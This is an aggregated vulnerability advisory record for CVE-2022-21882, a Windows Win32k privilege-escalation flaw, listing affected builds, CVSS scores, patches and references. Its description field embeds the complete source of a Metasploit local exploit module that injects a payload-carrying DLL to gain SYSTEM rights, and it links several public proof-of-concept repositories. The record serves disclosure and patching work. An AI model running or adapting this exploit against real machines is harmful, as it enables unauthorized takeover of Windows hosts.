Details of VAR-202201-0580

ID

VAR-202201-0580

CVE

CVE-2022-21882

TITLE

plural Microsoft Windows Elevated authority vulnerabilities in products

Trust: 0.8

sources: JVNDB: JVNDB-2022-001057

DESCRIPTION

Win32k Elevation of Privilege Vulnerability. Microsoft Windows 10 , Windows 11 , Windows Server Has Win32k There is a vulnerability that can elevate privileges due to a flaw in. Microsoft Win32k是美国微软（Microsoft）公司的一个用于Windows多用户管理的系统文件. Microsoft Win32K 存在安全漏洞。以下产品和版本受到影响：Windows 10 Version 21H1 for 32-bit Systems,Windows Server 2022,Windows Server 2022 (Server Core installation),Windows 10 Version 1909 for ARM64-based Systems,Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 1909 for 32-bit Systems,Windows 10 Version 1909 for x64-based Systems,Windows 10 Version 21H1 for x64-based Systems,Windows 10 Version 21H1 for ARM64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation),Windows 11 for x64-based Systems,Windows 11 for ARM64-based Systems,Windows 10 Version 21H2 for 32-bit Systems,Windows 10 Version 21H2 for ARM64-based Systems,Windows 10 Version 21H2 for x64-based Systems. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Deprecated moved_from 'exploit/windows/local/cve_2021_1732_win32k' def initialize(info = {}) super( update_info( info, { 'Name' => 'Win32k ConsoleControl Offset Confusion', 'Description' => %q{ A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets. }, 'License' => MSF_LICENSE, 'Author' => [ # CVE-2021-1732 'BITTER APT', # exploit as used in the wild 'JinQuan', # detailed analysis 'MaDongZe', # detailed analysis 'TuXiaoYi', # detailed analysis 'LiHao', # detailed analysis # CVE-2022-21882 'L4ys', # github poc # both CVEs 'KaLendsi', # github pocs # Metasploit exploit 'Spencer McIntyre' # metasploit module ], 'Arch' => [ ARCH_X64 ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ] ], 'Payload' => { 'DisableNops' => true }, 'References' => [ # CVE-2021-1732 references [ 'CVE', '2021-1732' ], [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ], [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ], [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ], [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ], # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ], [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ], [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ], [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ], # CVE-2022-21882 references [ 'CVE', '2022-21882' ], [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ], [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ] ], 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_OS_RESTARTS, ], 'Reliability' => [ REPEATABLE_SESSION, ], 'SideEffects' => [] } } ) ) end def check sysinfo_value = sysinfo['OS'] if sysinfo_value !~ /windows/i # Non-Windows systems are definitely not affected. return Exploit::CheckCode::Safe end build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i vprint_status("Windows Build Number = #{build_num}") unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044) print_error('The exploit only supports Windows 10 versions 1803 - 21H2') return CheckCode::Safe end CheckCode::Appears end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') end encoded_payload = payload.encoded execute_dll( ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'), [encoded_payload.length].pack('I<') + encoded_payload ) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end

Trust: 2.34

sources: NVD: CVE-2022-21882 // JVNDB: JVNDB-2022-001057 // CNNVD: CNNVD-202201-802 // VULMON: CVE-2022-21882 // PACKETSTORM: 166169

AFFECTED PRODUCTS

vendor:	microsoft	model:	windows 10 20h2	scope:	lt	version:	10.0.19042.1466	Trust: 1.0
vendor:	microsoft	model:	windows server 2019	scope:	lt	version:	10.0.17763.2452	Trust: 1.0
vendor:	microsoft	model:	windows server 2022	scope:	lt	version:	10.0.20348.469	Trust: 1.0
vendor:	microsoft	model:	windows 11 21h2	scope:	lt	version:	10.0.22000.434	Trust: 1.0
vendor:	microsoft	model:	windows 10 21h1	scope:	lt	version:	10.0.19043.1466	Trust: 1.0
vendor:	microsoft	model:	windows 10 1909	scope:	lt	version:	10.0.18363.2037	Trust: 1.0
vendor:	microsoft	model:	windows server 20h2	scope:	lt	version:	10.0.19042.1466	Trust: 1.0
vendor:	microsoft	model:	windows 10 1809	scope:	lt	version:	10.0.17763.2452	Trust: 1.0
vendor:	microsoft	model:	windows 10 21h2	scope:	lt	version:	10.0.19044.1466	Trust: 1.0
vendor:	マイクロソフト	model:	microsoft windows server	scope:	eq	version:	2019	Trust: 0.8
vendor:	マイクロソフト	model:	microsoft windows server	scope:	eq	version:	2022	Trust: 0.8
vendor:	マイクロソフト	model:	microsoft windows server	scope:	eq	version:	2022 (server core installation)	Trust: 0.8
vendor:	マイクロソフト	model:	microsoft windows server 2022	scope:	eq	version:	(server core installation)	Trust: 0.8
vendor:	マイクロソフト	model:	microsoft windows server 2019	scope:	-	version:	-	Trust: 0.8
vendor:	マイクロソフト	model:	microsoft windows 10	scope:	-	version:	-	Trust: 0.8
vendor:	マイクロソフト	model:	microsoft windows server	scope:	eq	version:	20h2 (server core installation)	Trust: 0.8
vendor:	マイクロソフト	model:	microsoft windows 11	scope:	-	version:	-	Trust: 0.8
vendor:	マイクロソフト	model:	microsoft windows server 2022	scope:	eq	version:	-	Trust: 0.8
vendor:	マイクロソフト	model:	microsoft windows server	scope:	eq	version:	2019 (server core installation)	Trust: 0.8

sources: JVNDB: JVNDB-2022-001057 // NVD: CVE-2022-21882

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD:	CVE-2022-21882
value:	HIGH
Trust: 1.8
secure@microsoft.com:	CVE-2022-21882
value:	HIGH
Trust: 1.0
CNNVD:	CNNVD-202201-802
value:	HIGH
Trust: 0.6
VULMON:	CVE-2022-21882
value:	HIGH
Trust: 0.1

NVD:
severity:	HIGH
baseScore:	7.2
vectorString:	AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector:	LOCAL
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	3.9
impactScore:	10.0
acInsufInfo:	FALSE
obtainAllPrivilege:	FALSE
obtainUserPrivilege:	FALSE
obtainOtherPrivilege:	FALSE
userInteractionRequired:	FALSE
version:	2.0
Trust: 1.0
NVD:	CVE-2022-21882
severity:	HIGH
baseScore:	7.2
vectorString:	AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector:	LOCAL
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	NONE
impactScore:	NONE
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.9

NVD:
baseSeverity:	HIGH
baseScore:	7.8
vectorString:	CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector:	LOCAL
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	1.8
impactScore:	5.9
version:	3.1
Trust: 1.0
secure@microsoft.com:
baseSeverity:	HIGH
baseScore:	7.0
vectorString:	CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector:	LOCAL
attackComplexity:	HIGH
privilegesRequired:	LOW
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	1.0
impactScore:	5.9
version:	3.1
Trust: 1.0
NVD:	CVE-2022-21882
baseSeverity:	HIGH
baseScore:	7.8
vectorString:	CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector:	LOCAL
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	NONE
impactScore:	NONE
version:	3.0
Trust: 0.8

sources: VULMON: CVE-2022-21882 // JVNDB: JVNDB-2022-001057 // CNNVD: CNNVD-202201-802 // NVD: CVE-2022-21882 // NVD: CVE-2022-21882

PROBLEMTYPE DATA

problemtype:	CWE-787	Trust: 1.0
problemtype:	Improper authority management (CWE-269) [NVD Evaluation ]	Trust: 0.8

sources: JVNDB: JVNDB-2022-001057 // NVD: CVE-2022-21882

THREAT TYPE

local

Trust: 0.6

sources: CNNVD: CNNVD-202201-802

TYPE

other

Trust: 0.6

sources: CNNVD: CNNVD-202201-802

CONFIGURATIONS

sources: NVD: CVE-2022-21882

PATCH

title:	Win32k Elevation of Privilege Vulnerability Security Update Guide	url:	https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2022-21882	Trust: 0.8
title:	Microsoft Win32k Security vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=184439	Trust: 0.6
title:	CVE-2022-21882	url:	https://github.com/l4ys/cve-2022-21882	Trust: 0.1
title:	cve-2022-21882-poc	url:	https://github.com/sailay1996/cve-2022-21882-poc	Trust: 0.1
title:	CVE-2021-1732	url:	https://github.com/r1l4-i3pur1l4/cve-2021-1732	Trust: 0.1
title:	CVE-2022-21882	url:	https://github.com/david-honisch/cve-2022-21882	Trust: 0.1
title:	CVE-2022-21882	url:	https://github.com/kalendsi/cve-2022-21882	Trust: 0.1
title:	CVE-2022-21882	url:	https://github.com/dishfwk/cve-2022-21882	Trust: 0.1
title:	CVE-2022-21882	url:	https://github.com/r1l4-i3pur1l4/cve-2022-21882	Trust: 0.1
title:	exp_x64 code by 1900	url:	https://github.com/legendsaber/exp_x64	Trust: 0.1

sources: VULMON: CVE-2022-21882 // JVNDB: JVNDB-2022-001057 // CNNVD: CNNVD-202201-802

EXTERNAL IDS

db:	NVD	id:	CVE-2022-21882	Trust: 3.4
db:	PACKETSTORM	id:	166169	Trust: 1.7
db:	JVNDB	id:	JVNDB-2022-001057	Trust: 0.8
db:	CNNVD	id:	CNNVD-202201-802	Trust: 0.6
db:	VULMON	id:	CVE-2022-21882	Trust: 0.1

sources: VULMON: CVE-2022-21882 // JVNDB: JVNDB-2022-001057 // PACKETSTORM: 166169 // CNNVD: CNNVD-202201-802 // NVD: CVE-2022-21882

REFERENCES

url:	http://packetstormsecurity.com/files/166169/win32k-consolecontrol-offset-confusion-privilege-escalation.html	Trust: 2.2
url:	https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2022-21882	Trust: 1.6
url:	https://nvd.nist.gov/vuln/detail/cve-2022-21882	Trust: 1.5
url:	https://www.ipa.go.jp/security/ciadr/vul/20220112-ms.html	Trust: 0.8
url:	https://www.jpcert.or.jp/at/2022/at220002.html	Trust: 0.8
url:	https://msrc.microsoft.com/update-guide/vulnerability/cve-2022-21882	Trust: 0.6
url:	https://vigilance.fr/vulnerability/windows-vulnerabilities-de-decembre-2021-37219	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2021-1732	Trust: 0.1
url:	https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e'	Trust: 0.1
url:	https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-1732'	Trust: 0.1
url:	https://www.fuzzysecurity.com/tutorials/expdev/22.html'	Trust: 0.1
url:	https://github.com/rapid7/metasploit-framework	Trust: 0.1
url:	https://github.com/l4ys/cve-2022-21882'	Trust: 0.1
url:	https://github.com/kalendsi/cve-2022-21882'	Trust: 0.1
url:	https://metasploit.com/download	Trust: 0.1
url:	https://github.com/kalendsi/cve-2021-1732-exploit'	Trust: 0.1
url:	https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html'	Trust: 0.1
url:	https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm'	Trust: 0.1
url:	https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/'	Trust: 0.1
url:	https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html'	Trust: 0.1

sources: JVNDB: JVNDB-2022-001057 // PACKETSTORM: 166169 // CNNVD: CNNVD-202201-802 // NVD: CVE-2022-21882

CREDITS

RyeLv (@b2ahex)

Trust: 0.6

sources: CNNVD: CNNVD-202201-802

SOURCES

db:	VULMON	id:	CVE-2022-21882
db:	JVNDB	id:	JVNDB-2022-001057
db:	PACKETSTORM	id:	166169
db:	CNNVD	id:	CNNVD-202201-802
db:	NVD	id:	CVE-2022-21882

LAST UPDATE DATE

2024-07-25T03:57:49.081000+00:00

SOURCES UPDATE DATE

db:	VULMON	id:	CVE-2022-21882	date:	2023-12-21T00:00:00
db:	JVNDB	id:	JVNDB-2022-001057	date:	2022-01-21T06:03:00
db:	CNNVD	id:	CNNVD-202201-802	date:	2022-03-10T00:00:00
db:	NVD	id:	CVE-2022-21882	date:	2024-07-24T16:48:20.753

SOURCES RELEASE DATE

db:	VULMON	id:	CVE-2022-21882	date:	2022-01-11T00:00:00
db:	JVNDB	id:	JVNDB-2022-001057	date:	2022-01-21T00:00:00
db:	PACKETSTORM	id:	166169	date:	2022-02-28T16:49:05
db:	CNNVD	id:	CNNVD-202201-802	date:	2022-01-11T00:00:00
db:	NVD	id:	CVE-2022-21882	date:	2022-01-11T21:15:11.507